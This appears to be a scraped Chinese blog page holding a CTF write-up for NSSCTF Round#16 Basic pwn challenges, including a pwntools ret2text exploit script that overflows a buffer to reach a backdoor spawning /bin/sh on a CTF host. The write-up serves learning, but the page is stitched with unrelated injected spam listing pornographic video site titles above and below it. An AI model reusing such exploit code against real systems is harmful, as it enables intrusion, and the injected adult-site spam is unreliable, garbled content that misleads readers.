<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      wyxhhh

      NSSCTF Round#16 Basic WriteUp

      NSSCTF Round#16Basic wp

      一.pwn

      1.nc_pwnre

      nc連接

      屏幕截圖 2024-01-13 205948

      得到題目,給了一段匯編代碼以及40個(gè)十六進(jìn)制數(shù)字

      分析代碼可知,將一個(gè)字符串與10h即16進(jìn)行異或運(yùn)算,二次異或運(yùn)算得到字符串

      TlNTQ1RGe1dFTGMwTV9UMF9wV25fdzByMWQhfQ==
      

      base64解密得到

      NSSCTF{WELc0M_T0_pWn_w0r1d!}
      

      又題目nc連接后要求一個(gè)輸入,輸入后

      屏幕截圖 2024-01-13 154922

      要求另一個(gè)輸入,嘗試ls,cat flag成功

      屏幕截圖 2024-01-13 155059

      2.ret_text

      拿到題目附件進(jìn)行常規(guī)checksec

      屏幕截圖 2024-01-13 161721

      沒有特別的,32位且開啟了NX

      IDA發(fā)現(xiàn)主體函數(shù),且存在后門函數(shù)backdoor執(zhí)行system("/bin/sh")

      屏幕截圖 2024-01-13 161517

      通過輸入-2147483648繞過if判斷進(jìn)入溢出點(diǎn),然后就是常規(guī)ret2text

      #exp
      from pwn import*
      p=remote("node7.anna.nssctf.cn",28276)
      
      backdoor_addr=0x08049328
      
      payload=b'a'*0x24+p32(backdoor_addr)
      
      p.sendline(b'-2147483648')
      p.sendline(payload)
      p.interactive()
      

      posted on 2024-01-13 21:49  wyx0404  閱讀(129)  評(píng)論(0)    收藏  舉報(bào)

      導(dǎo)航

      主站蜘蛛池模板: 精品国偷自产在线视频99| 中文字幕日韩精品东京热| 国产最新进精品视频| 夏邑县| 日本久久一区二区三区高清| 狠狠色噜噜狠狠狠狠777米奇| 人妻熟女一二三区夜夜爱| 又污又黄又无遮挡的网站| 亚洲国产福利成人一区二区| 色婷婷综合久久久久中文一区二区| 久久热精品视频在线视频| 成人欧美一区二区三区在线观看| 东方四虎在线观看av| 伊人色综合一区二区三区| 五月婷之久久综合丝袜美腿 | 亚洲一区在线成人av| 久久青草国产精品一区| 日产无人区一线二码三码2021| 日韩国产成人精品视频| 国产精品一区二区三区91| 国产欧美精品一区aⅴ影院| 大尺度国产一区二区视频| 性饥渴少妇AV无码毛片| 高清偷拍一区二区三区| 久播影院无码中文字幕| 亚洲色无码播放亚洲成av| 日本在线a一区视频高清视频| 久久精品国产熟女亚洲av| 国内在线视频一区二区三区| 亚洲Av综合日韩精品久久久| 日韩av一区二区高清不卡| 亚洲精品天堂成人片AV在线播放| 狠狠躁夜夜躁人人爽天天古典| 久久精品女人的天堂av| 野外做受又硬又粗又大视频√| 九九热在线精品免费视频| 99福利一区二区视频| AV无码免费不卡在线观看| 亚洲中少妇久久中文字幕| 欧美变态另类zozo| 国产一区二区在线有码|